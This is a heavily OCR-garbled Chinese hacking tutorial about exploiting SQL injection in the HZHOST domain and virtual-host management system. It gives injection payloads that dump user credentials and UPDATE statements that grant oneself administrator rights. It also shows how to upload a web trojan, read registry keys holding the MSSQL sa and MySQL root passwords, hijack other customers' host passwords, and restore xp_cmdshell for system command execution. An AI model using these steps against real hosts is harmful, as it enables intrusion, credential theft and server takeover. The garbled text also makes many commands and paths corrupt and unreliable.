《HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用.docx》由会员分享,可在线阅读,更多相关《HZHOST域名虚拟主机管理系统sql注射漏洞+进一步利用.docx(6页珍藏版)》请在第壹文秘上搜索。
1、这是一个域名主机实时管理系统。在百度搜索:Ii1.1.e:(域名主机实时管理系统),会找到大状采用这种系统的网站!太术语了.就是在线开通的一个管理系统.一套Beb程序.和US管理程序,实现在线开通的玩&.所以:我们可以免费申请域名和空间!哈哈!Web程序方面写的并常严谨。大量的过滤。由于是商业版的程序,所以我没有源码.本来是有的,但是放在家里的电脑上。放导俣时播的She1.1.现在都被用了。我现在又比较懒,就没去弄源代码,反正大家知道怎么弄的就行了.这又是一个文本根的注射.我真不知道作者是怎么想的。其他地方都被过遮了,就留下域名管理这里没过滤,z./.凹J31片aoB1.,W,司Jt(Q)用H
2、ttp:Krrtn.hzho,,KHZHOST6,5怔名王酬巴理系统罪存4逋造域名管理主机管理邮局管理数据库管理HP空间管理T零萼Cs.MOtKHZMOST6.5总名王昨理系统演玲公益,俏域名管理主机管理邮局管理数据库管理11p空间管理.MgoG后退,j.*a;,爱索:收错夹夕,,.t(0I如http:/admn.ho$tqd.con/domanj1.o0and=,1.可以同时爆出一个用户的怅号和密码.想爆出其他用户的语句自己构迨吧.第二个方法是:1231.PDATEmendstSETusys=6WHEREUnme=你注册的用户名一123UPDATEmem1stSETuPWr=2WHEREUn
3、me=你注册的用户名一这2句话就能够梃升卤己为筵统管理员第三个方法偎麻烦。但是很有效果。直捣黄龙。很强大。我给出如下语句,大家自己研究去吧!爆路径语句第一步:建立表123z0and1=1笫四步:暴出你想要的文件夹名字和文件名字123and0(se1.ecttopIcast(isfi1.easnvarchar(1000)+char(94)+cast(nameasnvarchar(4000)from(se1.ectdistincttopIfromfoofoofooorderbyis)torderbyis(1.esc)-and,=t1修改中间红色的1,依次爆出。至于差异备份语句。让nbsi3各诉你吧
4、。对HZHOST域名虚拟主机管理京诜Sq1.注射漏洞进一步利用I我记得还有2肾关于hzhost的漏洞利用文章.名字不记得了.大家去搜联“hzhost漏洞找找吧!里面摄到下面两点内容!11.是提到c:“indowstemp下有hzhost主机留下的ftp昼谡记录.有用户名和密码2,是利用hzhost拿系挽主机最高权限的.安装了hzhost的主机,其InSSqISa密码.ysq1.root密玛还有SerV-U的administrator密码全部保存在注班表中.位置在IIKEY1.OCA1.MACHINEsoftwarehzhostconfigsettingsmysq1passHKEY1.(O1._
5、MACH1.NEsoftwnrehzhostconfigs?ttingsinnstersvrpass经过了hzhost自己的加第方式.象e1.VCICMIZSKBf*dcc52443a3872cc159这样的字符串。不过在hzhost后台可以复原!拿到了Sa密码,或者root帝码,最高权限就在家前!禁止了u.s的话。大家就传aspx木马导报!我们传了一个asp木马上去后,在incsconstr.asp下面可以看到鼓据库连接率。然后连接到数据库。通过执行SE1.ECTFROMhst1.st语句.可以看到很多主机记录.如图String.931.1S1.ECFRaWhst1.stCcnnands:表
6、de1.de1.】de1.(de1.de1.(de1.de1.de1.dade1.dUde1.dade1.dade1.名acc1.stdv1.三tfQstWPPo1.are1.startistato三ysCISIstd三dnehsftpk*Xp|#3c5f1.2400471d51.5本站泵战tUostpppoo1.01000611I0发现什么没有?上的雷码和hzhosi主机百己的加宙车很相似。没错,主机管理的也码也是经过他自己的加密方式加了密!而我们在主机管理的池力!B屏西茄删囹EB站点仅删除HS中的YEB玷点,,不影硒!泡)使用完全拉聆该站点不仅IH除11S中的ATB站点,而且删除FTP、系
7、引用尸以及主机根目录1除该站点以及订单完全IH嫁服务短辎点、目录,井IE陡数宪库中的订单信息I丰机眼玛换(实时生效)I新地址:FrP用尸名:FrpS码:1219139.240.73-j./f三三a33域名:$9赧务器名:脚婢制:ASPFKPCGI11SETV禁止下栽JSPNETZo空间大小:300mI号号(/S.2C1.看到明文密封。说明他又给复原回来了。明白了么?我们先通过aspx木马导出ysq1.Bssq1.的root.sa密码扣密率后.2008-12-2714:15:11SySinfOIISSPyWebShe1.1.CommandSqITOo1.SSUEXPPOrtSCanRegSh训|
8、Copyriaht(C)2008Bin-VvU.RoOTTcIt.HeT.Cn-Reverse-IPkey:HKEY-1.OCA1.-MACHINEsoftwarehzhostconfgse1tngsVA1.UE:mysq1.passRead|:Resu1.t:aPWu334zMaK831HMBof9fc298b1.d3d0a我们通过这条语句,修改别人的主机密码。UPDATEhst1.stSETham3j4zMaK831HMBof9fc298b1.d3d0aWHEREhID=10000471然后回过头去看主机密码.(这时候被转成了明文)完全K1.除该站点以及订单完全Bi除服务SS潴玷点、目录,并删除数据库中重就拿到了roo1.宓码为:shi1.070921注雳:由于有多种跟制.我截的图可能不是偎完美。但是此方法地对可行。这方法是看到别人写的利用hzhost取得最高权限得到的启发。戢戢他。我们也可以同样拿到SH再磅,用Sa怅号密码远程连接,直接恢复XPCnIdSheI1.就可以执行系统命令了!好了.就比结束!期待牛人写出复原密码程序!这样就不用麻烦了!